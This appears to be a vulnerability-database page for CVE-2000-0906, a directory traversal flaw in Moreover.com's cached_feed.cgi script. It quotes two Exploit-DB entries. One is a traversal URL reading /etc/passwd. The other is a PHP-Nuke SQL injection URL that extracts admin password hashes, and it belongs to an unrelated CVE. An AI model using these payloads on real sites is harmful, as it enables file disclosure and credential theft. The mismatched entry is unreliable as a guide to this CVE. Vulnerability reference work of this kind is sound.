CVE-2000-0906
published 2000-12-19CVE-2000-0906: Directory traversal vulnerability in Moreover.com cached_feed.cgi script version 4.July.00 allows remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP426medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.55%
94.4th percentile
Directory traversal vulnerability in Moreover.com cached_feed.cgi script version 4.July.00 allows remote attackers to read arbitrary files via a .. (dot dot) attack on the category or format parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moreover.com | cached_feed.cgi_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-Nuke Module Docum - 'artid' SQL Injection
exploitdb·2008-02-20
CVE-2008-0906 PHP-Nuke Module Docum - 'artid' SQL Injection
PHP-Nuke Module Docum - 'artid' SQL Injection
---
#########################################################################
php-nuke modules Docum remote sql inj
#########################################################################
Found:DamaR
[email protected]
Hack Bitti ama Dönmek Yakın Since 2000
/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
#########################################################################
Example: http://www.xxx.com.ar/mt/
#########################################################################
# milw0rm.com [2008-02-20]
Exploit-DB
Moreover CGI script - File Disclosure
exploitdb·2000-10-02
CVE-2000-0906 Moreover CGI script - File Disclosure
Moreover CGI script - File Disclosure
---
source: https://www.securityfocus.com/bid/1762/info
The 'cached_feed' CGI script supplied by newsfeed vendor Moreover.com contains a file-disclosure vulnerability. The script's 'obtain_file' function, designed to return the contents of a specified file for display in the browser, fails to adequately filter ".." character sequences in user-supplied input. As a result, a carefully formed URL that is submitted to the script can result in the disclosure of files (readable by HTTP user) outside of the CGI script's "allowed" area.
Version 1.0 of the product is affected. The vendor repaired the script and released version 2.0 before this vulnerability was published.
http://www.example.com/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-10/0013.htmlhttp://www.securityfocus.com/bid/1762https://exchange.xforce.ibmcloud.com/vulnerabilities/5334http://archives.neohapsis.com/archives/bugtraq/2000-10/0013.htmlhttp://www.securityfocus.com/bid/1762https://exchange.xforce.ibmcloud.com/vulnerabilities/5334
2000-12-19
Published